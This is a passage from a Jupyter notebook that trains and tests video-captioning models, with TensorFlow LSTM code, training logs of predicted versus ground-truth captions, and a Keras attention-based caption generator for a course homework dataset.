tf.nn.rnn_cell.DropoutWrapper(lstm_cap,output_keep_prob=dropout_prob)\n\n #Prepare input for lstm_video\n video_rshp = tf.reshape(video,[-1,frame_dim])\n video_rshp = tf.nn.dropout(video_rshp,keep_prob=dropout_prob)\n video_emb = tf.nn.xw_plus_b(video_rshp,W_im2cap,b_im2cap)\n video_emb = tf.reshape(video_emb,[batch_size,n_steps,hidden_dim])\n padding = tf.zeros([batch_size,n_steps-1,hidden_dim])\n video_input = tf.concat([video_emb,padding],1)\n #video_input=video_emb\n print (\"Video_input: {}\".format(video_input.get_shape()))\n #Run lstm_vid for 2*n_steps-1 timesteps\n with tf.variable_scope('LSTM_Video') as scope:\n out_vid,state_vid = tf.nn.dynamic_rnn(lstm_vid,video_input,dtype=tf.float32)\n print (\"Video_output: {}\".format(out_vid.get_shape()))\n\n #Prepare input for lstm_cap\n padding = tf.zeros([batch_size,n_steps_vocab,hidden_dim])\n caption_vectors = tf.nn.embedding_lookup(word_emb,caption[:,0:n_steps_vocab-1])\n caption_vectors = tf.nn.dropout(caption_vectors,keep_prob=dropout_prob)\n caption_2n = tf.concat([padding,caption_vectors],1)\n #caption_2n = caption_vectors\n caption_input = tf.concat([caption_2n,out_vid],2)\n print (\"Caption_input: {}\".format(caption_input.get_shape()))\n #Run lstm_cap for 2*n_steps-1 timesteps\n with tf.variable_scope('LSTM_Caption') as scope:\n out_cap,state_cap = tf.nn.dynamic_rnn(lstm_cap,caption_input,dtype=tf.float32)\n print (\"Caption_output: {}\".format(out_cap.get_shape()))\n\n #Compute masked loss\n output_captions = out_cap[:,n_steps_vocab:,:]\n output_logits = tf.reshape(output_captions,[-1,hidden_dim])\n output_logits = tf.nn.dropout(output_logits,keep_prob=dropout_prob)\n output_logits = tf.nn.xw_plus_b(output_logits,W_H2vocab,b_H2vocab)\n output_labels = tf.reshape(caption[:,1:],[-1])\n caption_mask_out = tf.reshape(caption_mask[:,1:],[-1])\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=output_logits,labels=output_labels)\n masked_loss = loss*caption_mask_out\n loss = tf.reduce_sum(masked_loss)/tf.reduce_sum(caption_mask_out)\n return video,caption,caption_mask,output_logits,loss,dropout_prob\n\ndb1 = None\ndb2 = None\ndb3 = None\ndef train():\n global db1,db2,db3\n with tf.Graph().as_default():\n learning_rate = 0.0001\n video,caption,caption_mask,output_logits,loss,dropout_prob = build_model()\n optim = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(loss)\n nEpoch = 300\n nIter = int(nEpoch*6000/batch_size)\n \n ckpt_file = './ckpt_v4/model_58000.ckpt.meta'\n\n saver = tf.train.Saver()\n with tf.Session() as sess:\n if ckpt_file:\n saver_ = tf.train.import_meta_graph(ckpt_file)\n saver_.restore(sess,'./ckpt_v4/model_58000.ckpt')\n print (\"Restored model\")\n else:\n sess.run(tf.global_variables_initializer())\n for i in range(nIter):\n #print(i)\n vids,caps,caps_mask = fetch_data_batch(batch_size=batch_size)\n db1,db2,db3 = vids, caps, caps_mask\n #print(type(vids),type(caps), type(caps_mask))\n #print(vids,caps, caps_mask)\n _,curr_loss,o_l = sess.run([optim,loss,output_logits],feed_dict={video:vids,\n caption:caps,\n caption_mask:caps_mask,\n dropout_prob:0.5})\n\n if i%1000 == 0:\n print (\"\\nIteration {} \\n\".format(i))\n out_logits = o_l.reshape([batch_size,n_steps_vocab-1,vocab_size])\n output_captions = np.argmax(out_logits,2)\n #print_in_english(output_captions[0:4])\n #print (\"GT Captions\")\n #print_in_english(caps[0:4])\n print (\"Current train loss: {} \".format(curr_loss))\n vids,caps,caps_mask,_ = fetch_data_batch_val(batch_size=batch_size)\n db1,db2,db3 = vids,caps,caps_mask\n curr_loss,o_l = sess.run([loss,output_logits],feed_dict={video:vids,\n caption:caps,\n caption_mask:caps_mask,\n dropout_prob:1.0})\n out_logits = o_l.reshape([batch_size,n_steps_vocab-1,vocab_size])\n output_captions = np.argmax(out_logits,2)\n print_in_english(output_captions[0:2])\n print (\"GT Captions\")\n print_in_english(caps[0:2])\n print (\"Current validation loss: {} \".format(curr_loss))\n\n if i%2000 == 0:\n saver.save(sess,'./ckpt_v5/model_'+str(i)+'.ckpt')\n print ('Saved {}'.format(i))", "_____no_output_____" ] ], [ [ "### Training Begins !!!", "_____no_output_____" ] ], [ [ "train()", "Network config: \nN_Steps: 30\nHidden_dim:500\nFrame_dim:2048\nBatch_size:30\nVocab_size:29325\n\nCreated weights\nVideo_input: (30, 59, 500)\nVideo_output: (30, 59, 500)\nCaption_input: (30, 59, 1000)\nCaption_output: (30, 59, 500)\nINFO:tensorflow:Restoring parameters from ./ckpt_v4/model_58000.ckpt\nRestored model\n\nIteration 0 \n\nCurrent train loss: 5.710939407348633 \n1 man are <BOS>\n..................................................\n2 man men are <BOS> <BOS> on on <BOS>\n..................................................\nGT Captions\n1 <BOS> men drawing guns and then football player playing\n..................................................\n2 <BOS> two men driving a ferrari\n..................................................\nCurrent validation loss: 6.091744422912598 \nSaved 0\n\nIteration 1000 \n\nCurrent train loss: 3.989447593688965 \n1 a are a\n..................................................\n2 a are on a\n..................................................\nGT Captions\n1 <BOS> montage of baseball players celebrating to intense music\n..................................................\n2 <BOS> people working on engines\n..................................................\nCurrent validation loss: 3.8030765056610107 \n\nIteration 2000 \n\nCurrent train loss: 4.344245910644531 \n1 a man is a guitar\n..................................................\n2 a old man is about the\n..................................................\nGT Captions\n1 <BOS> a man playing a guitar\n..................................................\n2 <BOS> an old man talks about cats\n..................................................\nCurrent validation loss: 4.4142632484436035 \nSaved 2000\n\nIteration 3000 \n\nCurrent train loss: 3.8703577518463135 \n1 two men are wrestling\n..................................................\n2 a man is with game\n..................................................\nGT Captions\n1 <BOS> two guys are wrestling in a competition\n..................................................\n2 <BOS> a boy playing the piano\n..................................................\nCurrent validation loss: 4.140491962432861 \n\nIteration 4000 \n\nCurrent train loss: 3.676469087600708 \n1 a woman is is and a\n..................................................\n2 a man is a cartoon\n..................................................\nGT Captions\n1 <BOS> a person slices potatoes into smaller pieces\n..................................................\n2 <BOS> a man in the rain looking at a rock\n..................................................\nCurrent validation loss: 3.797583818435669 \nSaved 4000\n\nIteration 5000 \n\nCurrent train loss: 4.081212997436523 \n1 a man is a news show\n..................................................\n2 a is a man is shown about the people\n..................................................\nGT Captions\n1 <BOS> a man read the tv flash news and market rates\n..................................................\n2 <BOS> hero of the film is talking to some girls very seriously and the girl listens carefully\n..................................................\nCurrent validation loss: 4.362054824829102 \n\nIteration 6000 \n\nCurrent train loss: 4.080102443695068 \n1 a person is cooking food cooking\n..................................................\n2 a boy are with house\n..................................................\nGT Captions\n1 <BOS> a person is peeling and mashing cooked poatoes\n..................................................\n2 <BOS> the kids play the theft and police\n..................................................\nCurrent validation loss: 3.6474521160125732 \nSaved 6000\n\nIteration 7000 \n\nCurrent train loss: 4.0086588859558105 \n1 a women are are at a men men\n..................................................\n2 a man is is being a and and and and\n..................................................\nGT Captions\n1 <BOS> two bored women look at two other women who are excitedly speaking\n..................................................\n2 <BOS> a quad chopter is delivering drinks\n..................................................\nCurrent validation loss: 4.521246910095215 \n\nIteration 8000 \n\nCurrent train loss: 4.09481143951416 \n1 a are on a chair room\n..................................................\n2 two men are are wrestling\n..................................................\nGT Captions\n1 <BOS> men sitting in a locker room talking\n..................................................\n2 <BOS> two man s are fighting with each other on the ground\n..................................................\nCurrent validation loss: 4.40539026260376 \nSaved 8000\n\nIteration 9000 \n\nCurrent train loss: 3.190986394882202 \n1 a talking about news of\n..................................................\n2 a man is talking about\n..................................................\nGT Captions\n1 <BOS> man discussing the swastica s on each man\n..................................................\n2 <BOS> a man is talking\n..................................................\nCurrent validation loss: 4.049018859863281 \n\nIteration 10000 \n\nCurrent train loss: 3.836989164352417 \n1 a man man is is is is a on a animated\n..................................................\n2 a man is a is is a and\n..................................................\nGT Captions\n1 <BOS> a first person shooter game that takes place in an outdoor area\n..................................................\n2 <BOS> a sticker of biker man\n..................................................\nCurrent validation loss: 3.7681522369384766 \nSaved 10000\n\nIteration 11000 \n\nCurrent train loss: 3.4665136337280273 \n1 a man is a blue of shirt is walking down the road road\n..................................................\n2 a girl playing are playing to playing is playing\n..................................................\nGT Captions\n1 <BOS> a woman in a lime green shirt is running down a dirt road through the forest\n..................................................\n2 <BOS> three barbie dolls are talking while one is examining the foot of one of the dolls to see if it is hurt\n..................................................\nCurrent validation loss: 3.5693869590759277 \n\nIteration 12000 \n\nCurrent train loss: 3.8586039543151855 \n1 a cartoon animals a animals\n..................................................\n2 a man of on song\n..................................................\nGT Captions\n1 <BOS> animated cartoon with sick monkey\n..................................................\n2 <BOS> a group performing a show\n..................................................\nCurrent validation loss: 4.297967433929443 \nSaved 12000\n\nIteration 13000 \n\nCurrent train loss: 3.591733694076538 \n1 a man man is being on a kitchen\n..................................................\n2 a girl girl is a talking a hair\n..................................................\nGT Captions\n1 <BOS> a shirtless teenager is working in the kitchen and commenting upon his actions\n..................................................\n2 <BOS> a young woman washing and combing her hair\n..................................................\nCurrent validation loss: 4.377688884735107 \n\nIteration 14000 \n\nCurrent train loss: 3.4024927616119385 \n1 a man is being played\n..................................................\n2 a small is walking around the stairs and\n..................................................\nGT Captions\n1 <BOS> a game is been played by the person in his computer\n..................................................\n2 <BOS> a person is walking down some steep stairs with heavy plant growth to the sides\n..................................................\nCurrent validation loss: 3.9335079193115234 \nSaved 14000\n\nIteration 15000 \n\nCurrent train loss: 3.353208303451538 \n1 a is how to use a\n..................................................\n2 a man is showing on a and on\n..................................................\nGT Captions\n1 <BOS> woman showing how to keep things in the new product\n..................................................\n2 <BOS> a person is working with yellow twine wrapped around their hand\n..................................................\nCurrent validation loss: 3.9493484497070312 \n\nIteration 16000 \n\nCurrent train loss: 3.4370555877685547 \n" ] ], [ [ "### Testing", "_____no_output_____" ] ], [ [ "def test():\n with tf.Graph().as_default():\n learning_rate = 0.00001\n video,caption,caption_mask,output_logits,loss,dropout_prob = build_model()\n optim = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(loss)\n ckpt_file = './ckpt_v5/model_58000.ckpt.meta'\n saver = tf.train.Saver()\n with tf.Session() as sess:\n if ckpt_file:\n saver_ = tf.train.import_meta_graph(ckpt_file)\n saver_.restore(sess,'./ckpt_v5/model_58000.ckpt')\n print (\"Restored model\")\n else:\n sess.run(tf.initialize_all_variables())\n while(1):\n vid,caption_GT,_,current_batch_vids = fetch_data_batch_val(1)\n caps,caps_mask = convert_caption(['<BOS>'],word2id,30)\n\n for i in range(30):\n o_l = sess.run(output_logits,feed_dict={video:vid,\n caption:caps,\n caption_mask:caps_mask,\n dropout_prob:1.0})\n out_logits = o_l.reshape([batch_size,n_steps-1,vocab_size])\n output_captions = np.argmax(out_logits,2)\n caps[0][i+1] = output_captions[0][i]\n print_in_english(caps)\n if id2word[output_captions[0][i]] == '<EOS>':\n break\n print ('............................\\nGT Caption:\\n')\n print_in_english(caption_GT)\n play_video = input('Should I play the video? ')\n if play_video.lower() == 'y':\n playVideo(current_batch_vids)\n test_again = input('Want another test run? ')\n if test_again.lower() == 'n':\n break\ntest()", "Network config: \nN_Steps: 30\nHidden_dim:500\nFrame_dim:2048\nBatch_size:1\nVocab_size:29325\n\nCreated weights\nVideo_input: (1, 59, 500)\nVideo_output: (1, 59, 500)\nCaption_input: (1, 59, 1000)\nCaption_output: (1, 59, 500)\nINFO:tensorflow:Restoring parameters from ./ckpt_v5/model_58000.ckpt\nRestored model\n1 <BOS> a\n..................................................\n1 <BOS> a person\n..................................................\n1 <BOS> a person is\n..................................................\n1 <BOS> a person is cooking\n..................................................\n1 <BOS> a person is cooking a\n..................................................\n1 <BOS> a person is cooking a dish\n..................................................\n1 <BOS> a person is cooking a dish in\n..................................................\n1 <BOS> a person is cooking a dish in a\n..................................................\n1 <BOS> a person is cooking a dish in a pot\n..................................................\n1 <BOS> a person is cooking a dish in a pot\n..................................................\n............................\nGT Caption:\n\n1 <BOS> a woman shows a mixing technique\n..................................................\nShould I play the video? n\nWant another test run? y\n1 <BOS> a\n..................................................\n1 <BOS> a woman\n..................................................\n1 <BOS> a woman is\n..................................................\n1 <BOS> a woman is talking\n..................................................\n1 <BOS> a woman is talking about\n..................................................\n1 <BOS> a woman is talking about her\n..................................................\n1 <BOS> a woman is talking about her hair\n..................................................\n1 <BOS> a woman is talking about her hair\n..................................................\n............................\nGT Caption:\n\n1 <BOS> the food is placed in the plate while the woman on white sofa is talking\n..................................................\nShould I play the video? n\nWant another test run? y\n1 <BOS> a\n..................................................\n1 <BOS> a man\n..................................................\n1 <BOS> a man is\n..................................................\n1 <BOS> a man is talking\n..................................................\n1 <BOS> a man is talking about\n..................................................\n1 <BOS> a man is talking about a\n..................................................\n1 <BOS> a man is talking about a video\n..................................................\n1 <BOS> a man is talking about a video game\n..................................................\n1 <BOS> a man is talking about a video game\n..................................................\n............................\nGT Caption:\n\n1 <BOS> a diglett fights a voltorb in an epic pokemon battle\n..................................................\nShould I play the video? n\nWant another test run? y\n1 <BOS> a\n..................................................\n1 <BOS> a man\n..................................................\n1 <BOS> a man and\n..................................................\n1 <BOS> a man and a\n..................................................\n1 <BOS> a man and a woman\n..................................................\n1 <BOS> a man and a woman are\n..................................................\n1 <BOS> a man and a woman are walking\n..................................................\n1 <BOS> a man and a woman are walking in\n..................................................\n1 <BOS> a man and a woman are walking in a\n..................................................\n1 <BOS> a man and a woman are walking in a park\n..................................................\n1 <BOS> a man and a woman are walking in a park\n..................................................\n............................\nGT Caption:\n\n1 <BOS> a group of children are playing in the forest while a man sings\n..................................................\nShould I play the video? n\nWant another test run? y\n1 <BOS> a\n..................................................\n1 <BOS> a man\n..................................................\n1 <BOS> a man is\n..................................................\n1 <BOS> a man is talking\n..................................................\n1 <BOS> a man is talking about\n..................................................\n1 <BOS> a man is talking about a\n..................................................\n1 <BOS> a man is talking about a dog\n..................................................\n1 <BOS> a man is talking about a dog\n..................................................\n............................\nGT Caption:\n\n1 <BOS> a large spider is crawling on a white wall\n..................................................\nShould I play the video? n\nWant another test run? y\n1 <BOS> a\n..................................................\n1 <BOS> a man\n..................................................\n1 <BOS> a man is\n..................................................\n1 <BOS> a man is talking\n..................................................\n1 <BOS> a man is talking to\n..................................................\n1 <BOS> a man is talking to a\n..................................................\n1 <BOS> a man is talking to a woman\n..................................................\n1 <BOS> a man is talking to a woman\n..................................................\n............................\nGT Caption:\n\n1 <BOS> youtubers react to shia labouf the musical\n..................................................\nShould I play the video? n\nWant another test run? y\n1 <BOS> a\n..................................................\n1 <BOS> a woman\n..................................................\n1 <BOS> a woman is\n..................................................\n1 <BOS> a woman is singing\n..................................................\n1 <BOS> a woman is singing\n..................................................\n............................\nGT Caption:\n\n1 <BOS> an older man sheds tears of joy while a young woman sings a song to a large audience\n..................................................\nShould I play the video? n\nWant another test run? n\n" ] ], [ [ "### Attention", "_____no_output_____" ] ], [ [ " coding: utf-8\n\n# In[1]:\n\nimport tensorflow as tf\nimport numpy as np\nimport json\nimport os\n\nfrom keras.layers.embeddings import Embedding\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Input, GRU, Dropout\nfrom keras.optimizers import RMSprop\nfrom keras.layers.wrappers import TimeDistributed\nfrom keras.preprocessing import sequence\nfrom keras.models import Model\nfrom keras import backend as K\nfrom keras.utils import np_utils\nfrom keras.callbacks import ModelCheckpoint\n\nfrom Attention import Attention_Layer\nfrom Multimodel_layer import Multimodel_Layer\n\n\n# In[2]:\n\nclass Caption_Generator:\n \n def __init__(self):\n self.captions = []\n self.captions_in_each_video = []\n self.word2id = {}\n self.id2word = {}\n self.max_sentence_length = 0\n self.vocabulary_size = 0\n self.batch_size = 25\n self.embedding_output_shape = 512\n \n ################################################################################################\n def read_data(self, n_batch):\n print \"loading Data for new Batch... \"\n files = [] \n \n #reading captions\n with open('MLDS_HW2/MLDS_hw2_data/training_label.json') as data_file:\n training_labels = json.load(data_file)\n \n \n self.captions_in_each_video = []\n for i in n_batch:\n files.append(training_labels[i]['id'])\n for j in range(len(training_labels[i]['caption'])):\n training_labels[i]['caption'][j] = \"<s> \"+training_labels[i]['caption'][j]+\" <e>\" \n self.captions.append(training_labels[i]['caption'][j].lower().split(' '))\n self.captions_in_each_video.append(len(training_labels[i]['caption']))\n\n \n #reading video features\n video_features = np.zeros((len(files),80,4096))\n \n video_features[0] = np.load(\"MLDS_HW2/MLDS_hw2_data/training_data/feat/\"+files[0]+\".npy\")\n\n for i in range(1,len(files)):\n video_features[i] = np.load(\"MLDS_HW2/MLDS_hw2_data/training_data/feat/\"+files[i]+\".npy\")\n \n print \"Data Loaded Successfully.....\"\n\n return video_features\n ################################################################################################\n def create_vocabulary(self):\n\n print \"creating vocabulary...\"\n labels = []\n with open('MLDS_HW2/MLDS_hw2_data/training_label.json') as data_file:\n training_labels = json.load(data_file)\n \n for i in range(len(training_labels)):\n for j in range(len(training_labels[i]['caption'])):\n training_labels[i]['caption'][j] = \"<s> \"+training_labels[i]['caption'][j]+\" <e>\" \n labels.append(training_labels[i]['caption'][j].lower().split(' '))\n \n self.max_sentence_length = 1 + max([len(caption) for caption in labels])\n print(\"\\t Max sentence length : \", self.max_sentence_length)\n \n #computing char2id and id2char vocabulary\n index = 0\n for caption in labels:\n for word in caption:\n if word not in self.word2id:\n self.word2id[word] = index\n self.id2word[index] = word\n index += 1\n \n \n self.vocabulary_size = len(self.word2id)\n \n \n \n ################################################################################################\n def transform_inputs(self, video_features):\n #transforming the no of samples of video features equal to no of samples of captions\n new_features = np.zeros((len(self.captions), 80, 4096))\n for i in range(len(self.captions_in_each_video)):\n for j in range(self.captions_in_each_video[i]):\n new_features[j] = video_features[i]\n \n return new_features\n \n \n ################################################################################################\n def one_of_N_encoding(self): \n print(\"encoding inputs...\") \n #creating caption tensor that is a matrix of size numCaptions x maximumSentenceLength x wordVocabularySize\n encoded_tensor = np.zeros((len(self.captions), self.max_sentence_length, self.vocabulary_size), dtype=np.float16)\n label_tensor = np.zeros((len(self.captions), self.max_sentence_length, self.vocabulary_size), dtype =np.float16)\n #one-hot-encoding\n for i in range(len(self.captions)):\n for j in range(len(self.captions[i])):\n encoded_tensor[i, j, self.word2id[self.captions[i][j]]] = 1\n if j<len(self.captions[i])-1:\n label_tensor[i,j,self.word2id[self.captions[i][j+1]]] = 1\n \n return encoded_tensor, label_tensor\n \n ################################################################################################\n def embedding_layer(self, input_data):\n print(\"embedding inputs....\")\n model = Sequential()\n model.add(Dense(self.embedding_output_shape, input_shape = (self.max_sentence_length, self.vocabulary_size)))\n model.add(Activation('relu'))\n model.compile('rmsprop','mse')\n embedding_weights = model.get_weights()\n output_array = model.predict(input_data)\n self.embedding_weights = model.get_weights()\n output_weights = np.asarray(self.embedding_weights[0]).T\n self.embedding_weights[0] = output_weights\n self.embedding_weights[1] = np.ones((self.vocabulary_size,))\n return output_array\n \n ################################################################################################\n def data_preprocessing(self, n_batch):\n #########################Preprocessing Data##############################\n #print(\"Data Preprocessing.......\")\n #print(\"\\tReading data.......\")\n video_features = self.read_data(n_batch)\n video_features = self.transform_inputs(video_features)\n #print(\"\\tvideo features : \",video_features.shape)\n #print(\"\\tCaptions : \", len(self.captions))\n #print(\"\\tCreating Vocabulary......\")\n #self.create_vocabulary()\n\n # one-hot encoding of captions\n #print(\"\\tEncoding Captions......\")\n encoded_tensor, label_tensor = self.one_of_N_encoding()\n #print(\"\\tEncoded Captions : \",encoded_tensor.shape)\n\n # embedding the one-hot encoding of each word into 512\n #print(\"\\tEmbedding Captions.......\")\n embedded_input = self.embedding_layer(encoded_tensor)\n\n #print(\"\\tEmbedding Weights : \", np.asarray(self.embedding_weights[0]).shape)\n\n #print(\"\\tEmbedded_captions : \",embedded_input.shape)\n \n return video_features, embedded_input, label_tensor\n \n ################################################################################################ \n def build_model(self, video_features, embedded_input):\n #########################training model##################################\n print('Building Sentence Generator Model...')\n\n input1 = Input(shape=(embedded_input.shape[1],embedded_input.shape[2]), dtype='float32')\n #input2 = Input(shape=(visual_features.shape[0],visual_features.shape[1]), dtype='float32')\n input2 = Input(shape=(video_features.shape[1], video_features.shape[2]), dtype='float32')\n \n model = Sequential()\n \n layer1 = GRU(512, return_sequences = True, input_shape = (embedded_input.shape[1],embedded_input.shape[2]), activation = 'relu')(input1)\n \n attention_layer = Attention_Layer(output_dim = 32)([layer1, input2])\n\n multimodel_layer = Multimodel_Layer(output_dim = 1024)([layer1,attention_layer])\n\n dropout = Dropout(0.5)(multimodel_layer)\n\n layer2 = TimeDistributed(Dense(activation = 'tanh', units = 512))(dropout)\n\n softmax_layer = Dense(units = self.vocabulary_size, activation = 'softmax', weights = self.embedding_weights)(layer2)\n \n model = Model(inputs = [input1, input2], outputs = [softmax_layer])\n \n '''\n # We also specify here the optimization we will use, in this case we use RMSprop with learning rate 0.001.\n # RMSprop is commonly used for RNNs instead of regular SGD.\n # categorical_crossentropy is the same loss used for classification problems using softmax. (nn.ClassNLLCriterion)\n '''\n model.compile(loss = 'categorical_crossentropy', optimizer = RMSprop(lr=0.001))\n\n print(model.summary()) # Convenient function to see details about the network model.\n\n return model\n \n ################################################################################################ \n def train(self): \n \n batches = np.arange(1450)\n #########################training model##################################\n for epoch in range(10):\n print \"\\n\\n\\nEpoch : \",epoch+1\n np.random.shuffle(batches)\n batch = 0\n for iteration in range(1450/self.batch_size):\n if batch+self.batch_size >= 1450:\n n_batch = batches[batch:-1]\n else: \n n_batch = batches[batch:(batch+self.batch_size)]\n batch += self.batch_size\n self.captions = []\n video_features, embedded_input, label_tensor = self.data_preprocessing(n_batch)\n if(iteration == 0 and epoch == 0):\n model = caption_generator.build_model(video_features, embedded_input)\n # define the checkpoint\n filepath=\"Sentence_Generator_Model_Results/word-weights-improvement-{epoch:02d}-{loss:.4f}.hdf5\"\n checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')\n callbacks_list = [checkpoint]\n\n print\"\\n\\n###########Training the model on epoch : \", epoch+1, \" batch : \", iteration+1 ,\" ###########\\n\\n\"\n model.fit(x = [embedded_input,video_features], y = label_tensor, batch_size = 256, epochs= 5, callbacks = callbacks_list)\n self.save_model(model,epoch)\n \n \n return model\n \n ################################################################################################ \n def save_model(self, model, epoch):\n # serialize model to JSON\n filename = \"Sentence_Generator_Model_Results/model_epoch_\"+str(epoch)+\".h5\"\n #with open(\"batch_model.json\", \"w\") as json_file:\n #json_file.write(model_json)\n # serialize weights to HDF5\n model.save_weights(filename)\n print(\"Saved model to disk\")\n \n ################################################################################################ \n def load_model(self, model, epoch):\n # load weights into new model\n filename = \"Sentence_Generator_Model_Results/model_epoch_\"+str(epoch)+\".h5\"\n model.load_weights(filename)\n print(\"Loaded model from disk\")\n return model\n \n ################################################################################################ \n def test(self, model, epoch):\n\n print(\"word : \",self.id2word[0])\n test_captions = []\n with open('MLDS_HW2/MLDS_hw2_data/testing_public_label.json') as data_file:\n testing_labels = json.load(data_file)\n \n files = []\n self.captions_in_each_video = []\n\n for i in range(len(testing_labels)):\n files.append(testing_labels[i]['id'])\n for j in range(len(testing_labels[i]['caption'])):\n test_captions.append(testing_labels[i]['caption'][j].lower().split(' '))\n self.captions_in_each_video.append(j)\n \n encoded_tensor = np.zeros((len(test_captions), self.max_sentence_length, self.vocabulary_size), dtype=np.float16)\n encoded_tensor[:,0,0] = 1\n\n print(\"number of files : \",len(files))\n #reading video features\n video_features = np.zeros((len(files),80,4096))\n \n print(\"shape : \",np.load(\"MLDS_HW2/MLDS_hw2_data/testing_data/feat/\"+files[0]+\".npy\").shape)\n\n for i in range(len(files)):\n video_features[i] = np.load(\"MLDS_HW2/MLDS_hw2_data/testing_data/feat/\"+files[i]+\".npy\")\n\n new_features = np.zeros((len(self.captions), 80, 4096))\n for i in range(len(self.captions_in_each_video)):\n for j in range(self.captions_in_each_video[i]):\n new_features[j] = video_features[i]\n \n new_features = np.reshape(new_features, (len(self.captions)*80, 1, 4096))\n \n\n #print(\"new_features : \", new_features.shape)\n encoded_tensor = np.repeat(encoded_tensor, 80, axis=0)\n\n embedded_input = self.embedding_layer(encoded_tensor)\n\n print(\"embedded_input : \", embedded_input.shape)\n print(\"video_features : \", new_features.shape)\n\n model = self.build_model()\n model = self.load_model(model)\n\n output = model.predict([embedded_input[:200,:,:], new_features[:200,:,:]])\n \n with open(\"Model_Results/Results/generated_text_epoch\"+str(epoch)+\".txt\", \"a\") as fileHandler:\n \n for i in range(200):\n text = \"\"\n for j in range(41):\n word = np.argmax(output[i,j,:])\n text += self.id2word[word]\n text += \" \"\n fileHandler.write(\"Generated text for example \",i,\" : \", text)\n fileHandler.write(\"\\n\")\n fileHandler.close() \n \n\n ################################################################################################\n\n\n\n# In[3]:\n\ncaption_generator = Caption_Generator()\n\n\n# In[ ]:\n\ncaption_generator.create_vocabulary()\n\n\n# In[ ]:\n\nmodel = caption_generator.train()\n\n\n# In[ ]:", "_____no_output_____" ], [ "!top", "\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[mtop - 06:22:12 up 1:41, 4 users, load average: 1.11, 0.35, 0.12\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nTasks:\u001b[m\u001b[m\u001b[1m 193 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 1 \u001b[m\u001b[mrunning,\u001b[m\u001b[m\u001b[1m 192 \u001b[m\u001b[msleeping,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mstopped,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mzombie\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n%Cpu(s):\u001b[m\u001b[m\u001b[1m 0.4 \u001b[m\u001b[mus,\u001b[m\u001b[m\u001b[1m 0.3 \u001b[m\u001b[msy,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mni,\u001b[m\u001b[m\u001b[1m 99.0 \u001b[m\u001b[mid,\u001b[m\u001b[m\u001b[1m 0.3 \u001b[m\u001b[mwa,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mhi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[msi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mst\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Mem :\u001b[m\u001b[m\u001b[1m 26752224 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 24606748 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 584804 \u001b[m\u001b[mused,\u001b[m\u001b[m\u001b[1m 1560672 \u001b[m\u001b[mbuff/cache\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Swap:\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mused.\u001b[m\u001b[m\u001b[1m 25745880 \u001b[m\u001b[mavail Mem \u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\u001b[K\n\u001b[7m PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND \u001b[m\u001b[m\u001b[K\n\u001b[m 3645 narain.+ 20 0 304328 56088 12332 S 6.7 0.2 0:01.78 jupyter-no+ \u001b[m\u001b[m\u001b[K\n\u001b[m 1 root 20 0 119952 6100 3976 S 0.0 0.0 0:07.39 systemd \u001b[m\u001b[m\u001b[K\n\u001b[m 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd \u001b[m\u001b[m\u001b[K\n\u001b[m 4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 6 root 20 0 0 0 0 S 0.0 0.0 0:00.02 ksoftirqd/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 7 root 20 0 0 0 0 S 0.0 0.0 0:00.12 rcu_sched \u001b[m\u001b[m\u001b[K\n\u001b[m 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh \u001b[m\u001b[m\u001b[K\n\u001b[m 9 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-dr+ \u001b[m\u001b[m\u001b[K\n\u001b[m 11 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 14 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 15 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 18 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/1:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/2 \u001b[m\u001b[m\u001b[K\u001b[H\u001b[mtop - 06:22:15 up 1:41, 4 users, load average: 1.11, 0.35, 0.12\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nTasks:\u001b[m\u001b[m\u001b[1m 193 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 1 \u001b[m\u001b[mrunning,\u001b[m\u001b[m\u001b[1m 192 